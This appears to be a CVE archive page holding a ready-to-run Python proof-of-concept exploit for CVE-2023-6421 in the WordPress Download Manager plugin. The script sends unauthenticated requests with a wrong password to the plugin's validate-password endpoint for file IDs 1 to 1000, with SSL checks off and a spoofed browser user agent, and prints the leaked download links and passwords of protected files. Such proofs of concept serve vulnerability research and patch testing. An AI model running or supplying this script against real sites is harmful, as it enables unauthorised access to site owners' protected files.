4837 Total CVEs
26 Years
GitHub
Home / 2023 / CVE-2023-6421
README.md
Rendering markdown...
POC / CVE-2023-6421.py PY
⬇ Raw GitHub ✕ Close 
import argparse
import requests
import sys
import os
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
## Exploit script by @RandomRobbieBF

http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy

DESCRIPTION = """ CVE-2023-6421 Download Manager < 3.2.83 - Unauthenticated Protected File Download Password Leak | The plugin does not protect file download's passwords, leaking it upon receiving an invalid one."""



def main(url):
    # Define the data to be sent in the POST request
    data_template = {
        'dataType': 'json',
        'execute': 'wpdm_getlink',
        'action': 'wpdm_ajax_call',
        'password': '123322'
    }

    for wpdm_id in range(1, 1001):  # Loop from 1 to 1000
        data = data_template.copy()  # Create a copy of the template
        data['__wpdm_ID'] = str(wpdm_id)  # Set the current ID

        try:
            user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

            # Send the POST request, ignoring SSL certificate warnings
            response = requests.post(url, data=data, verify=False, headers={"User-Agent": user_agent})

            # Check if the response is JSON
            try:
                json_response = response.json()
                
                # Check if the response contains the provided URL
                if 'downloadurl' in json_response and json_response['downloadurl'].startswith('/wp-json/'):
                    print(f"No link generated for ID {wpdm_id}.")
                else:
                    print(f"Response for ID {wpdm_id}: {json_response['downloadurl']}")
                    if "'op'" in response.text:
                       print(json_response)



            except ValueError:
                print(f"Response for ID {wpdm_id} is not in JSON format. Exiting.")
                sys.exit(1)

        except requests.exceptions.RequestException as e:
            print(f"An error occurred for ID {wpdm_id}: {e}")
            sys.exit(1)





if __name__ == "__main__":
    # Set up argument parsing
    parser = argparse.ArgumentParser(description=DESCRIPTION)
    parser.add_argument('url', type=str, help='The base URL to send the request to (e.g., https://example.com)')

    args = parser.parse_args()
    full_url = f"{args.url}/wp-json/wpdm/validate-password"

    main(full_url)